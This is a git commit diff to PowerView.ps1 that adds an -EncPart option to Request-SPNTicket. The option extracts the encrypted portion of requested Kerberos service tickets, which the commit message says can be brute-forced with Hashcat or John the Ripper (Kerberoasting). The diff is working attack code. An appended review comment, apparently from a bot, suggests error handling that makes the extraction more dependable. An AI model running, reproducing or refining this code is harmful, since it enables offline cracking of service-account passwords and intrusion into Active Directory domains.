author | Matan Hart <matan.hart@cyberark.com> | 2016-08-25 12:27:15 +0300 |
committer | GitHub <noreply@github.com> | 2016-08-25 12:27:15 +0300 |
commit | 432cc017baf1f71732675058b1e090fc23714f08 (patch) | |
tree | 241dee29841d5466e97491422d64254e196254ba /Recon/PowerView.ps1 | |
parent | 869badc7f159d5bb772c2fe042c7b8f413c6f698 (diff) | |
Add the EncPart param to Request-SPNTicket
Adds the ability to return the encrypted part of the ticket.
This portion is the encrypted data that can be brute-forced with Kerberoast/Hashcat/JtR
Diffstat (limited to 'Recon/PowerView.ps1')
-rwxr-xr-x | Recon/PowerView.ps1 | 31 |
1 files changed, 29 insertions, 2 deletions
diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1
index 27f87c7..d779cfa 100755
--- a/Recon/PowerView.ps1
+++ b/Recon/PowerView.ps1
@@ -1321,12 +1321,22 @@ function Request-SPNTicket {
.PARAMETER SPN The service principal name to request the ticket for. Required. + + .PARAMETER EncPart + + Switch. Return the encrypted portion of the ticket (cipher). .EXAMPLE PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" Request a kerberos service ticket for the specified SPN. + + .EXAMPLE + + PS C:\> Request-SPNTicket -SPN "HTTP/web.testlab.local" -EncPart + + Request a kerberos service ticket for the specified SPN and return the encrypted portion of the ticket. .EXAMPLE
@@ -1346,7 +1356,11 @@ function Request-SPNTicket {
[Parameter(Mandatory=$True, ValueFromPipelineByPropertyName = $True)] [Alias('ServicePrincipalName')] [String[]] - $SPN + $SPN, + + [Alias('EncryptedPart')] + [Switch] + $EncPart ) begin {
@@ -1356,7 +1370,20 @@ function Request-SPNTicket {
 process {
 ForEach($UserSPN in $SPN) {
 Write-Verbose "Requesting ticket for: $UserSPN"
- New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+ if (!$EncPart) {
+ New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+ }
+ else {
+ $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+ $TicketByteStream = $Ticket.GetRequest()
+ if ($TicketByteStream)
+ {
+ $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace "-"
+ [System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
+ $Parts.RemoveAt($Parts.Count - 1)
+ $Parts -join "A48201"
+ }
+ }
 }
 }
 } |
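Review bot: The encrypted-part extraction in the new `else` branch fails silently whenever the ticket bytes do not match the hard-coded hex patterns: `04820...` and `A48201` appear to assume a specific two-byte DER length prefix on the cipher octet string and on the tagged authenticator, and when `-Split "A48201"` finds no match `$Parts` holds a single element, `$Parts.RemoveAt($Parts.Count - 1)` discards it, and the caller gets no output and no diagnostic for that SPN. The same silent outcome occurs when `$TicketByteStream` is empty, because `if ($TicketByteStream)` has no `else`. A guard such as `if ($Parts.Count -lt 2) { Write-Warning "Unexpected ticket layout for $UserSPN; encrypted part not extracted" }` placed before the `RemoveAt`, plus a `Write-Warning` for the empty-stream case, would make the failure visible, and a comment like `# string-level parse of the AP-REQ hex; assumes two-byte (0x82) DER lengths - brittle, a proper ASN.1 decode would be more robust` should document the assumption. Minor style point: `-not $EncPart` reads more clearly than `!$EncPart` for a `[Switch]` parameter. Request-SPNTicket begins outside the hunk; its closing braces are the hunk's final context lines.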